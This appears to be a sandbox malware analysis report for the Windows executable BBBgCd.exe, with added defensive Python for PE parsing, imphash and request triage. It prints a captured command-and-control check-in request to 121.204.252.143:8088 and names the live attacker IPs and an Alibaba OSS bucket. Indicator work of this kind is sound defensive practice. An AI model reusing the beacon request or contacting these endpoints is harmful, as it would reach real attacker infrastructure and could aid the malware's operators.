Analysis task

Analysis type  VM label  Start time  End time  Duration
File (Windows)  win7-sp1-x64-shaapp02-1  2023-06-07 21:03:08  2023-06-07 21:05:19  131 seconds

Maldun score

10.0 (Dangerous)

File details

File name BBBgCd.exe
File size 5468160 bytes
File type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 616962b526b69b6b1547ae7e36c88d95
SHA1 9249d816c8360d31e1fba60ffe40f3200302febd
SHA256 4ed65014dbfadcd23184c3f1add6e5a0d94b34c936ad32228f9e662cfd013c09
SHA512 6cd0104c4855aa35c27843acd95400cc214ad3d44c1959fd2f525add03dc4985af9f388990d2ca2bac1025c26ef118c5aa6298ba63430347fb5d99708b912f64
CRC32 DAC71357
Ssdeep 98304:DMwhDdfHHgNO5r29rYB4I2IHhIoeCDfs2KMAdAWedEVqxJHPTKV3O4:Hfg7qreCDf7KMAGZd4qxZPq31

Hosts contacted

IP address  Geolocation
121.204.252.143  China
59.110.117.124  China

Domain resolution

Domain  Rating  Response
moamoamoa.oss-cn-beijing.aliyuncs.com  unknown  A 59.110.117.124

PE information

Image base 0x00400000
Entry point 0x004addd5
Declared checksum 0x00000000
Actual checksum 0x0053fc69
Minimum OS version 4.0
Compile time 2023-02-05 16:47:49
Import hash (imphash) 35c91177c389e917ad24897bc4ed16c5

PE sections

Name  Virtual address  Virtual size  Raw data size  Characteristics  Entropy
.text 0x00001000 0x000cc9e6 0x000cd000 IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ 6.51
.rdata 0x000ce000 0x00438d02 0x00439000 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 7.89
.data 0x00507000 0x0005552a 0x0001a000 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 5.06
.rsrc 0x0055d000 0x00015740 0x00016000 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 6.63
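The PE fields above can be re-derived from the file itself, which is worth doing before trusting a sandbox's static pass. Two numbers in the table deserve a second look: a declared checksum of 0x00000000 means the linker was never asked to compute one, which is common for unsigned, non-driver builds and so is only a weak signal on its own; and an entropy of 7.89 across a 0x439000-byte .rdata section (about four fifths of the 5468160-byte file) is consistent with a compressed or encrypted blob stored as initialised data rather than with ordinary read-only strings and vtables. The Python below is an added example, not part of the Maldun report, that parses the PE headers, renders section characteristics the way the table does, computes per-section Shannon entropy and recomputes the PE/COFF checksum so the declared and actual values can be compared. build_sample_pe constructs a tiny PE32 image purely so the code runs offline; its section contents, timestamp and every other value are assumptions with no relation to BBBgCd.exe.

```python
import math
import struct
from datetime import datetime, timezone

# Section characteristic flags, in the order the report's table prints them.
SECTION_FLAGS = [(0x20, "IMAGE_SCN_CNT_CODE"), (0x40, "IMAGE_SCN_CNT_INITIALIZED_DATA"),
                 (0x80, "IMAGE_SCN_CNT_UNINITIALIZED_DATA"), (0x20000000, "IMAGE_SCN_MEM_EXECUTE"),
                 (0x40000000, "IMAGE_SCN_MEM_READ"), (0x80000000, "IMAGE_SCN_MEM_WRITE")]

def shannon_entropy(data: bytes) -> float:
    """Entropy in bits per byte (0.0 .. 8.0), the figure the section table shows."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)

def pe_checksum(data: bytes, checksum_offset: int) -> int:
    """PE/COFF image checksum as imagehlp computes it: one's-complement sum of the 16-bit
    words, skipping the 4-byte CheckSum field, folded to 16 bits, plus the file length."""
    total = 0
    skip = {checksum_offset, checksum_offset + 2}
    for off in range(0, len(data) & ~1, 2):
        if off not in skip:
            total += data[off] | (data[off + 1] << 8)
            total = (total & 0xFFFF) + (total >> 16)
    if len(data) & 1:  # an odd trailing byte counts as a low byte
        total += data[-1]
    total = (total & 0xFFFF) + (total >> 16)
    total = (total & 0xFFFF) + (total >> 16)
    return total + len(data)

def parse_pe(data: bytes) -> dict:
    """Extract the header fields the report prints, plus per-section entropy."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature missing")
    coff = e_lfanew + 4
    _, nsections, timestamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == 0x10B:    # PE32: 32-bit ImageBase follows BaseOfData
        image_base = struct.unpack_from("<I", data, opt + 28)[0]
    elif magic == 0x20B:  # PE32+: 64-bit ImageBase, no BaseOfData
        image_base = struct.unpack_from("<Q", data, opt + 24)[0]
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    checksum_offset = opt + 64  # same offset in both optional header layouts
    sections = []
    for i in range(nsections):
        hdr = opt + opt_size + 40 * i
        name, vsize, va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", data, hdr)
        flags = struct.unpack_from("<I", data, hdr + 36)[0]
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"), "virtual_address": va,
                         "virtual_size": vsize, "raw_size": raw_size,
                         "characteristics": "|".join(n for bit, n in SECTION_FLAGS if flags & bit),
                         "entropy": round(shannon_entropy(data[raw_ptr:raw_ptr + raw_size]), 2)})
    return {"image_base": image_base,
            "entry_point": struct.unpack_from("<I", data, opt + 16)[0],
            "declared_checksum": struct.unpack_from("<I", data, checksum_offset)[0],
            "actual_checksum": pe_checksum(data, checksum_offset),
            "checksum_offset": checksum_offset,
            "compile_time": datetime.fromtimestamp(timestamp, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S"),
            "sections": sections}

def build_sample_pe(sections) -> bytes:
    """Constructed minimal PE32 image for offline use; it is NOT the analysed sample.
    sections: list of (name, characteristics, raw_bytes); raw data is padded to the file alignment."""
    file_align, sect_align, opt_size = 0x200, 0x1000, 224
    hdr_size = -(-(64 + 4 + 20 + opt_size + 40 * len(sections)) // file_align) * file_align
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)        # e_lfanew
    # COFF: i386, section count, TimeDateStamp (assumed 2023-02-05 16:47:49 UTC), no symbols,
    # optional header size, EXECUTABLE_IMAGE | 32BIT_MACHINE
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0x63DFDDB5, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)        # PE32 magic
    struct.pack_into("<I", opt, 16, sect_align)  # AddressOfEntryPoint: start of first section
    struct.pack_into("<I", opt, 28, 0x00400000)  # ImageBase
    struct.pack_into("<II", opt, 32, sect_align, file_align)
    struct.pack_into("<I", opt, 60, hdr_size)    # SizeOfHeaders
    struct.pack_into("<I", opt, 64, 0)           # CheckSum deliberately left at zero
    struct.pack_into("<H", opt, 68, 2)           # IMAGE_SUBSYSTEM_WINDOWS_GUI
    headers, body = bytearray(), bytearray()
    for i, (name, flags, raw) in enumerate(sections):
        raw_size = -(-len(raw) // file_align) * file_align
        headers += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"), len(raw),
                               sect_align * (i + 1), raw_size, hdr_size + len(body), 0, 0, 0, 0, flags)
        body += raw.ljust(raw_size, b"\0")
    return bytes((dos + b"PE\0\0" + coff + opt + headers).ljust(hdr_size, b"\0") + body)

# Constructed section contents: a repeated 4-byte prologue (entropy exactly 2.0 bits) and every
# byte value twice (entropy exactly 8.0 bits), each 512 bytes so no padding is added.
SAMPLE_SECTIONS = [
    (".text", 0x60000020, b"\x55\x8b\xec\x90" * 128),
    (".rdata", 0x40000040, bytes(range(256)) * 2),
]

if __name__ == "__main__":
    info = parse_pe(build_sample_pe(SAMPLE_SECTIONS))
    print("checksum declared 0x%08x actual 0x%08x" % (info["declared_checksum"], info["actual_checksum"]))
    for s in info["sections"]:
        print("%(name)-7s 0x%(virtual_address)08x 0x%(virtual_size)08x 0x%(raw_size)08x %(characteristics)s %(entropy).2f" % s)
```

Run it against a real file with parse_pe(open(path, "rb").read()); a declared checksum that is non-zero but differs from the recomputed one is a stronger hint of post-link patching than the zero seen here, and a high-entropy section whose virtual size far exceeds its raw size (as .data does above, 0x5552a against 0x1a000) is where an unpacking stub will write at run time.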

Imports

Library iphlpapi.dll:
0x4ce6f4 GetAdaptersInfo
Library WINMM.dll:
0x4ce658 midiStreamOut
0x4ce660 waveOutWrite
0x4ce664 waveOutPause
0x4ce668 waveOutReset
0x4ce66c waveOutClose
0x4ce670 waveOutGetNumDevs
0x4ce674 waveOutOpen
0x4ce67c midiStreamOpen
0x4ce680 midiStreamProperty
0x4ce684 midiStreamStop
0x4ce688 midiOutReset
0x4ce68c midiStreamClose
0x4ce690 midiStreamRestart
0x4ce698 waveOutRestart
Library WS2_32.dll:
0x4ce6b4 WSACleanup
0x4ce6b8 inet_ntoa
0x4ce6bc closesocket
0x4ce6c0 getpeername
0x4ce6c4 accept
0x4ce6c8 ntohl
0x4ce6cc WSAAsyncSelect
0x4ce6d0 recvfrom
0x4ce6d4 ioctlsocket
0x4ce6d8 recv
Library KERNEL32.dll:
0x4ce174 GetSystemDirectoryA
0x4ce178 SetLastError
0x4ce188 GetVersion
0x4ce18c TerminateThread
0x4ce190 CreateMutexA
0x4ce194 TerminateProcess
0x4ce198 SuspendThread
0x4ce1a0 GetACP
0x4ce1a4 HeapSize
0x4ce1a8 RaiseException
0x4ce1ac GetLocalTime
0x4ce1b0 GetSystemTime
0x4ce1b4 RtlUnwind
0x4ce1b8 GetStartupInfoA
0x4ce1bc GetOEMCP
0x4ce1c0 GetCPInfo
0x4ce1c4 GetProcessVersion
0x4ce1c8 SetErrorMode
0x4ce1cc GlobalFlags
0x4ce1d0 GetCurrentThread
0x4ce1d4 GetFileTime
0x4ce1d8 TlsGetValue
0x4ce1dc LocalReAlloc
0x4ce1e0 TlsSetValue
0x4ce1e4 TlsFree
0x4ce1e8 GlobalHandle
0x4ce1ec TlsAlloc
0x4ce1f0 LocalAlloc
0x4ce1f4 lstrcmpA
0x4ce1f8 GlobalGetAtomNameA
0x4ce1fc GlobalAddAtomA
0x4ce200 GlobalFindAtomA
0x4ce204 GlobalDeleteAtom
0x4ce208 lstrcmpiA
0x4ce20c SetEndOfFile
0x4ce210 UnlockFile
0x4ce214 LockFile
0x4ce218 FlushFileBuffers
0x4ce21c DuplicateHandle
0x4ce220 lstrcpynA
0x4ce22c LocalFree
0x4ce238 GetCurrentProcess
0x4ce23c GetFileSize
0x4ce240 SetFilePointer
0x4ce244 CreateSemaphoreA
0x4ce248 ResumeThread
0x4ce24c ReleaseSemaphore
0x4ce258 GetProfileStringA
0x4ce25c WriteFile
0x4ce264 CreateFileA
0x4ce268 DeviceIoControl
0x4ce26c SetEvent
0x4ce270 FindResourceA
0x4ce274 LoadResource
0x4ce278 LockResource
0x4ce27c ReadFile
0x4ce280 lstrlenW
0x4ce284 GetModuleFileNameA
0x4ce288 WideCharToMultiByte
0x4ce28c MultiByteToWideChar
0x4ce290 GetCurrentThreadId
0x4ce294 ExitProcess
0x4ce298 GlobalSize
0x4ce29c GlobalFree
0x4ce2a8 lstrcatA
0x4ce2ac lstrlenA
0x4ce2b0 WinExec
0x4ce2b4 lstrcpyA
0x4ce2b8 FindNextFileA
0x4ce2bc InterlockedExchange
0x4ce2c0 GlobalReAlloc
0x4ce2c4 HeapFree
0x4ce2c8 HeapReAlloc
0x4ce2cc GetProcessHeap
0x4ce2d0 HeapAlloc
0x4ce2d4 GetUserDefaultLCID
0x4ce2d8 GetFullPathNameA
0x4ce2dc FreeLibrary
0x4ce2e0 LoadLibraryA
0x4ce2e4 GetLastError
0x4ce2e8 GetVersionExA
0x4ce2f0 CreateThread
0x4ce2f4 CreateEventA
0x4ce2f8 Sleep
0x4ce2fc GlobalAlloc
0x4ce300 GlobalLock
0x4ce304 GlobalUnlock
0x4ce308 GetTempPathA
0x4ce30c FindFirstFileA
0x4ce310 FindClose
0x4ce314 SetFileAttributesA
0x4ce318 GetFileAttributesA
0x4ce31c MoveFileA
0x4ce320 DeleteFileA
0x4ce324 CreateDirectoryA
0x4ce330 GetModuleHandleA
0x4ce334 GetProcAddress
0x4ce338 MulDiv
0x4ce33c GetCommandLineA
0x4ce340 GetTickCount
0x4ce344 CreateProcessA
0x4ce348 WaitForSingleObject
0x4ce34c CloseHandle
0x4ce360 SetHandleCount
0x4ce364 GetStdHandle
0x4ce368 GetFileType
0x4ce370 HeapDestroy
0x4ce374 HeapCreate
0x4ce378 VirtualFree
0x4ce380 LCMapStringA
0x4ce384 LCMapStringW
0x4ce388 VirtualAlloc
0x4ce38c IsBadWritePtr
0x4ce394 GetStringTypeA
0x4ce398 GetStringTypeW
0x4ce39c CompareStringA
0x4ce3a0 CompareStringW
0x4ce3a4 IsBadReadPtr
0x4ce3a8 IsBadCodePtr
0x4ce3ac SetStdHandle
0x4ce3b0 ReleaseMutex
Library USER32.dll:
0x4ce3f4 GetWindow
0x4ce3f8 GetActiveWindow
0x4ce3fc SetFocus
0x4ce400 IsIconic
0x4ce404 PeekMessageA
0x4ce408 SetMenu
0x4ce40c GetMenu
0x4ce410 SetWindowRgn
0x4ce414 GetMessagePos
0x4ce418 ScreenToClient
0x4ce41c GetSysColorBrush
0x4ce420 GetKeyState
0x4ce428 IsWindowEnabled
0x4ce42c ShowWindow
0x4ce434 LoadImageA
0x4ce43c ClientToScreen
0x4ce440 EnableMenuItem
0x4ce444 GetSubMenu
0x4ce448 GetDlgCtrlID
0x4ce450 CreateMenu
0x4ce454 ModifyMenuA
0x4ce458 AppendMenuA
0x4ce45c CreatePopupMenu
0x4ce460 DrawIconEx
0x4ce46c SetRectEmpty
0x4ce470 DispatchMessageA
0x4ce474 GetMessageA
0x4ce47c CopyRect
0x4ce480 LoadBitmapA
0x4ce484 WinHelpA
0x4ce488 KillTimer
0x4ce48c SetTimer
0x4ce490 ReleaseCapture
0x4ce494 GetCapture
0x4ce498 SetCapture
0x4ce49c GetScrollRange
0x4ce4a0 SetScrollRange
0x4ce4a4 SetScrollPos
0x4ce4a8 LoadStringA
0x4ce4b0 GetMenuState
0x4ce4b4 SetMenuItemBitmaps
0x4ce4b8 CheckMenuItem
0x4ce4bc SetRect
0x4ce4c0 InflateRect
0x4ce4c4 IntersectRect
0x4ce4c8 PtInRect
0x4ce4cc OffsetRect
0x4ce4d0 IsWindowVisible
0x4ce4d4 EnableWindow
0x4ce4d8 RedrawWindow
0x4ce4dc GetWindowLongA
0x4ce4e0 SetWindowLongA
0x4ce4e4 GetSysColor
0x4ce4e8 SetActiveWindow
0x4ce4ec SetCursorPos
0x4ce4f0 LoadCursorA
0x4ce4f4 SetCursor
0x4ce4f8 GetDC
0x4ce4fc FillRect
0x4ce500 IsRectEmpty
0x4ce504 ReleaseDC
0x4ce508 IsChild
0x4ce50c DestroyMenu
0x4ce510 SetForegroundWindow
0x4ce514 GetWindowRect
0x4ce518 EqualRect
0x4ce51c UpdateWindow
0x4ce520 ValidateRect
0x4ce524 InvalidateRect
0x4ce528 GetClientRect
0x4ce52c GetFocus
0x4ce530 GetParent
0x4ce534 GetTopWindow
0x4ce538 PostMessageA
0x4ce53c IsWindow
0x4ce540 SetParent
0x4ce544 DestroyCursor
0x4ce548 SendMessageA
0x4ce54c SetWindowPos
0x4ce550 MessageBoxA
0x4ce554 GetCursorPos
0x4ce558 GetSystemMetrics
0x4ce55c EmptyClipboard
0x4ce560 SetClipboardData
0x4ce564 OpenClipboard
0x4ce568 GetClipboardData
0x4ce56c CloseClipboard
0x4ce570 wsprintfA
0x4ce574 WaitForInputIdle
0x4ce578 WindowFromPoint
0x4ce57c DrawFocusRect
0x4ce580 DrawEdge
0x4ce584 DrawFrameControl
0x4ce588 TranslateMessage
0x4ce58c LoadIconA
0x4ce590 GetDesktopWindow
0x4ce594 GetClassNameA
0x4ce598 GetDlgItem
0x4ce59c GetWindowTextA
0x4ce5a0 GetForegroundWindow
0x4ce5a4 DefWindowProcA
0x4ce5a8 GetClassInfoA
0x4ce5ac IsZoomed
0x4ce5b0 PostQuitMessage
0x4ce5b4 DestroyIcon
0x4ce5bc UnregisterClassA
0x4ce5c8 CharUpperA
0x4ce5cc GetWindowDC
0x4ce5d0 BeginPaint
0x4ce5d4 EndPaint
0x4ce5d8 TabbedTextOutA
0x4ce5dc DrawTextA
0x4ce5e0 GrayStringA
0x4ce5e4 DestroyWindow
0x4ce5ec EndDialog
0x4ce5f0 GetNextDlgTabItem
0x4ce5f4 GetWindowPlacement
0x4ce5fc GetLastActivePopup
0x4ce600 GetMessageTime
0x4ce604 RemovePropA
0x4ce608 CallWindowProcA
0x4ce60c GetPropA
0x4ce610 UnhookWindowsHookEx
0x4ce614 SetPropA
0x4ce618 GetClassLongA
0x4ce61c CallNextHookEx
0x4ce620 SetWindowsHookExA
0x4ce624 CreateWindowExA
0x4ce628 GetMenuItemID
0x4ce62c GetMenuItemCount
0x4ce630 RegisterClassA
0x4ce634 GetScrollPos
0x4ce638 AdjustWindowRectEx
0x4ce63c MapWindowPoints
0x4ce640 SendDlgItemMessageA
0x4ce644 ScrollWindowEx
0x4ce648 IsDialogMessageA
0x4ce64c SetWindowTextA
0x4ce650 MoveWindow
Library GDI32.dll:
0x4ce024 GetViewportExtEx
0x4ce028 ExtSelectClipRgn
0x4ce02c LineTo
0x4ce030 MoveToEx
0x4ce034 ExcludeClipRect
0x4ce038 GetClipBox
0x4ce03c GetStockObject
0x4ce040 GetObjectA
0x4ce044 EndPage
0x4ce048 EndDoc
0x4ce04c DeleteDC
0x4ce050 StartDocA
0x4ce054 StartPage
0x4ce058 BitBlt
0x4ce05c CreateCompatibleDC
0x4ce060 Ellipse
0x4ce064 Rectangle
0x4ce068 LPtoDP
0x4ce06c PtVisible
0x4ce070 GetCurrentObject
0x4ce074 RoundRect
0x4ce07c GetDeviceCaps
0x4ce080 CreateDIBitmap
0x4ce084 DeleteObject
0x4ce088 SelectClipRgn
0x4ce08c CreatePolygonRgn
0x4ce090 GetClipRgn
0x4ce094 SetStretchBltMode
0x4ce09c SetBkColor
0x4ce0a0 ScaleWindowExtEx
0x4ce0a4 SetWindowExtEx
0x4ce0a8 SetWindowOrgEx
0x4ce0ac ScaleViewportExtEx
0x4ce0b0 SetViewportExtEx
0x4ce0b4 OffsetViewportOrgEx
0x4ce0b8 SetViewportOrgEx
0x4ce0bc SetMapMode
0x4ce0c0 SetTextColor
0x4ce0c4 SetROP2
0x4ce0c8 SetPolyFillMode
0x4ce0cc RectVisible
0x4ce0d0 TextOutA
0x4ce0d4 ExtTextOutA
0x4ce0d8 Escape
0x4ce0dc GetTextMetricsA
0x4ce0e0 CreateFontIndirectA
0x4ce0e4 CreateSolidBrush
0x4ce0e8 FillRgn
0x4ce0ec CreateRectRgn
0x4ce0f0 CombineRgn
0x4ce0f4 PatBlt
0x4ce0f8 CreatePen
0x4ce0fc SelectObject
0x4ce100 CreateBitmap
0x4ce104 CreateDCA
0x4ce10c GetPolyFillMode
0x4ce110 GetStretchBltMode
0x4ce114 GetROP2
0x4ce118 GetBkColor
0x4ce11c GetBkMode
0x4ce120 GetTextColor
0x4ce124 CreateRoundRectRgn
0x4ce128 CreateEllipticRgn
0x4ce12c SetBkMode
0x4ce130 RestoreDC
0x4ce134 SaveDC
0x4ce138 PathToRegion
0x4ce13c EndPath
0x4ce140 BeginPath
0x4ce144 GetWindowOrgEx
0x4ce148 GetViewportOrgEx
0x4ce14c GetWindowExtEx
0x4ce150 GetDIBits
0x4ce154 RealizePalette
0x4ce158 SelectPalette
0x4ce160 DPtoLP
0x4ce164 StretchBlt
0x4ce168 CreatePalette
Library WINSPOOL.DRV:
0x4ce6a4 OpenPrinterA
0x4ce6a8 DocumentPropertiesA
0x4ce6ac ClosePrinter
Library ADVAPI32.dll:
0x4ce000 RegOpenKeyExA
0x4ce004 RegSetValueExA
0x4ce008 RegQueryValueA
0x4ce00c RegCreateKeyExA
0x4ce010 RegCloseKey
Library SHELL32.dll:
0x4ce3e4 Shell_NotifyIconA
0x4ce3e8 ShellExecuteA
Library ole32.dll:
0x4ce6fc CLSIDFromProgID
0x4ce700 OleRun
0x4ce704 CoCreateInstance
0x4ce708 CLSIDFromString
0x4ce70c OleUninitialize
0x4ce710 OleInitialize
Library OLEAUT32.dll:
0x4ce3b8 UnRegisterTypeLib
0x4ce3bc LoadTypeLib
0x4ce3c0 LHashValOfNameSys
0x4ce3c4 RegisterTypeLib
0x4ce3c8 SysAllocString
0x4ce3cc VariantInit
0x4ce3d0 VariantCopyInd
0x4ce3d4 VariantChangeType
0x4ce3d8 VariantClear
Library COMCTL32.dll:
0x4ce018 None
0x4ce01c ImageList_Destroy
Library comdlg32.dll:
0x4ce6e0 ChooseColorA
0x4ce6e4 GetFileTitleA
0x4ce6e8 GetSaveFileNameA
0x4ce6ec GetOpenFileNameA
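The import hash in the PE information section (35c91177c389e917ad24897bc4ed16c5) is the imphash popularised by Mandiant and implemented in pefile: the import table is flattened, in import-table order, to lower-case "library.function" strings with the .dll/.ocx/.sys extension dropped and ordinal imports written as ordN, joined with commas and MD5-hashed. Because it depends only on what the linker emitted, it groups builds of the same project even when every other byte differs, which is the pivot you want from a table as large as the one above. The Python below is an added example, not the report's code, that reproduces the algorithm over a constructed excerpt of this import table; the excerpt and its ordering are assumptions, so the result is not expected to equal the report's value. The "None" the report prints for COMCTL32 at 0x4ce018 is most likely a nameless (ordinal) import, which the example stands in for with an assumed ordinal.

```python
import hashlib

# Constructed excerpt of the import table above: (library, [function names or ordinals]).
# Import-table order is part of the hash and the order here is an assumption, so this
# will not reproduce the report's 35c91177c389e917ad24897bc4ed16c5.
SAMPLE_IMPORTS = [
    ("iphlpapi.dll", ["GetAdaptersInfo"]),
    ("WS2_32.dll", ["WSACleanup", "inet_ntoa", "closesocket", "getpeername", "accept",
                    "ntohl", "WSAAsyncSelect", "recvfrom", "ioctlsocket", "recv"]),
    ("KERNEL32.dll", ["GetSystemDirectoryA", "SetLastError", "CreateMutexA", "WinExec",
                      "CreateProcessA", "GetProcAddress", "LoadLibraryA"]),
    ("ADVAPI32.dll", ["RegOpenKeyExA", "RegSetValueExA", "RegQueryValueA", "RegCreateKeyExA", "RegCloseKey"]),
    ("COMCTL32.dll", [17, "ImageList_Destroy"]),  # 17 is an assumed ordinal standing in for the report's "None"
]

def normalise_library(name: str) -> str:
    """Lower-case the module name and drop the extensions pefile strips before hashing."""
    lower = name.lower()
    for ext in (".dll", ".ocx", ".sys"):
        if lower.endswith(ext):
            return lower[:-len(ext)]
    return lower

def imphash_string(imports) -> str:
    """The comma-joined 'library.function' list that is hashed. Keeping it around lets you
    diff two samples whose imphash differs by a single import. Ordinals become 'ordN';
    pefile additionally maps known ws2_32/oleaut32 ordinals back to names, which this
    simplified version does not."""
    parts = []
    for lib, entries in imports:
        base = normalise_library(lib)
        for entry in entries:
            func = "ord%d" % entry if isinstance(entry, int) else entry.lower()
            parts.append("%s.%s" % (base, func))
    return ",".join(parts)

def imphash(imports) -> str:
    return hashlib.md5(imphash_string(imports).encode("ascii")).hexdigest()

if __name__ == "__main__":
    print(imphash_string(SAMPLE_IMPORTS))
    print("imphash", imphash(SAMPLE_IMPORTS))
```

Two properties matter when using the value for hunting: it is case-insensitive but order-sensitive, so a sample whose imports were rebuilt in a different order (for instance after repacking) will not match, and a heavily packed file often exposes only LoadLibraryA/GetProcAddress, giving an imphash shared with thousands of unrelated packed binaries. The table above is a full MFC-style import set, which makes this particular hash far more specific.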

No antivirus engine scan information.

Process tree

BBBgCd.exe, PID: 2684, parent PID: 2312

TCP

Source address  Source port  Destination address  Destination port
192.168.122.201 49164 121.204.252.143 8088
192.168.122.201 49160 23.219.38.8 80
192.168.122.201 49161 59.110.117.124 443 (moamoamoa.oss-cn-beijing.aliyuncs.com)
192.168.122.201 49162 59.110.117.124 443 (moamoamoa.oss-cn-beijing.aliyuncs.com)

UDP

Source address  Source port  Destination address  Destination port
192.168.122.201 57526 192.168.122.1 53
192.168.122.201 63246 192.168.122.1 53

HTTP requests

URI / HTTP data
URL: http://acroipm.adobe.com/11/rdr/CHS/win/nooem/none/message.zip
GET /11/rdr/CHS/win/nooem/none/message.zip HTTP/1.1
Accept: */*
If-Modified-Since: Mon, 08 Nov 2017 08:44:36 GMT
User-Agent: IPM
Host: acroipm.adobe.com
Connection: Keep-Alive
Cache-Control: no-cache

URL: http://121.204.252.143:8088/c.asp?code=CwNLBBBJARWBBBBBN%%2b/u/cRTOouh2vDLC0NwKNeza64NRKwolnOr2%%2b0/dqsueySYwuIMBlRP0JO29CKSDBOV/AolKNPTQPd%%2bkrYhPkpjEgrhXbTQ33ubWJ9c0TEPPLXLeQSd9Nscv5ScGztr6f3xQbmg1cBHFxenUH%%2bJjeORX/l7DYphGzaB9MjuBm%%2boE6IE3o4ju8JmRDNNe8odwQQ9bhWaXcV7pWysQMWLROFCMja87Te9ijeoXrdXzVQWEbMVAw81sKl/NAZkxvbk--23131
GET /c.asp?code=CwNLBBBJARWBBBBBN%%2b/u/cRTOouh2vDLC0NwKNeza64NRKwolnOr2%%2b0/dqsueySYwuIMBlRP0JO29CKSDBOV/AolKNPTQPd%%2bkrYhPkpjEgrhXbTQ33ubWJ9c0TEPPLXLeQSd9Nscv5ScGztr6f3xQbmg1cBHFxenUH%%2bJjeORX/l7DYphGzaB9MjuBm%%2boE6IE3o4ju8JmRDNNe8odwQQ9bhWaXcV7pWysQMWLROFCMja87Te9ijeoXrdXzVQWEbMVAw81sKl/NAZkxvbk--23131 HTTP/1.0
Host: 121.204.252.143
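The two requests above are of very different character. The first, to acroipm.adobe.com with User-Agent IPM, is consistent with the in-product messaging check Adobe Reader 11 performs on its own, and since the sandbox attributes every packet seen in the VM to the task it is most likely background noise rather than sample behaviour. The second is the one to build indicators from: a GET to a bare IP on port 8088, HTTP/1.0 with no User-Agent and nothing but a Host header, carrying a several-hundred-character base64-looking code parameter with a numeric suffix, which is the shape of a check-in beacon. (The report renders + in that parameter as %%2b; treating that as a doubled percent sign is an assumption.) The Python below is an added example, not the report's code, that turns those observations into a triage check and runs it over the two captured requests, embedded here as constructed sample input; the thresholds and the set of "standard" ports are assumptions, and it makes no attempt to decode the code value, for which the report gives neither a key nor a format. One caveat for the 59.110.117.124 connections further down: that address and the *.oss-cn-beijing.aliyuncs.com certificate in the TLS table are shared by every bucket in that Alibaba Cloud OSS region, so the bucket hostname moamoamoa.oss-cn-beijing.aliyuncs.com (visible in DNS and in the TLS SNI) is the indicator to pivot on, not the IP or the certificate fingerprint.

```python
import ipaddress
from urllib.parse import parse_qsl, urlsplit

# Constructed sample input: the two requests recorded above, copied as the report shows them.
C2_REQUEST = (
    "GET /c.asp?code=CwNLBBBJARWBBBBBN%%2b/u/cRTOouh2vDLC0NwKNeza64NRKwolnOr2%%2b0/dqsueySYwuIMBlRP0JO29CKSDBOV/"
    "AolKNPTQPd%%2bkrYhPkpjEgrhXbTQ33ubWJ9c0TEPPLXLeQSd9Nscv5ScGztr6f3xQbmg1cBHFxenUH%%2bJjeORX/l7DYphGzaB9MjuBm"
    "%%2boE6IE3o4ju8JmRDNNe8odwQQ9bhWaXcV7pWysQMWLROFCMja87Te9ijeoXrdXzVQWEbMVAw81sKl/NAZkxvbk--23131 HTTP/1.0\r\n"
    "Host: 121.204.252.143\r\n\r\n"
)
ADOBE_REQUEST = (
    "GET /11/rdr/CHS/win/nooem/none/message.zip HTTP/1.1\r\n"
    "Accept: */*\r\n"
    "If-Modified-Since: Mon, 08 Nov 2017 08:44:36 GMT\r\n"
    "User-Agent: IPM\r\n"
    "Host: acroipm.adobe.com\r\n"
    "Connection: Keep-Alive\r\n"
    "Cache-Control: no-cache\r\n\r\n"
)

STANDARD_PORTS = {80, 443, 8080}   # assumption: the web ports considered unremarkable here
OPAQUE_MIN_LEN = 40                # assumption: shortest query value treated as an opaque blob
OPAQUE_MIN_FRACTION = 0.9          # assumption: share of base64-alphabet characters required

def parse_request(raw: str) -> dict:
    """Split a captured request into method, target, version and lower-cased headers."""
    head = raw.replace("%%", "%")  # the report doubled percent signs (assumption); undo it
    lines = head.split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if not line:
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version, "headers": headers}

def base64_fraction(value: str) -> float:
    """Share of characters drawn from the base64 alphabet plus padding."""
    if not value:
        return 0.0
    return sum(c.isalnum() or c in "+/=" for c in value) / len(value)

def triage_request(raw: str, dst_port: int) -> list:
    """Return the beacon-like traits of one request; an empty list means nothing stood out."""
    req = parse_request(raw)
    flags = []
    host = urlsplit("//" + req["headers"].get("host", "")).hostname or ""
    try:
        ipaddress.ip_address(host)
        flags.append("bare_ip_host")      # no DNS name for reputation feeds to key on
    except ValueError:
        pass
    if dst_port not in STANDARD_PORTS:
        flags.append("nonstandard_port")
    if "user-agent" not in req["headers"]:
        flags.append("no_user_agent")     # browsers and the Windows HTTP stacks always send one
    if req["version"] == "HTTP/1.0":
        flags.append("http_1_0")          # usually hand-rolled socket code rather than WinINet/WinHTTP
    query = urlsplit(req["target"]).query
    for _name, value in parse_qsl(query, keep_blank_values=True):
        if len(value) >= OPAQUE_MIN_LEN and base64_fraction(value) >= OPAQUE_MIN_FRACTION:
            flags.append("opaque_query")  # long encoded blob: the usual encrypted check-in payload
            break
    return flags

if __name__ == "__main__":
    for label, raw, port in (("c.asp", C2_REQUEST, 8088), ("acroipm", ADOBE_REQUEST, 80)):
        print(label, triage_request(raw, port) or "nothing unusual")
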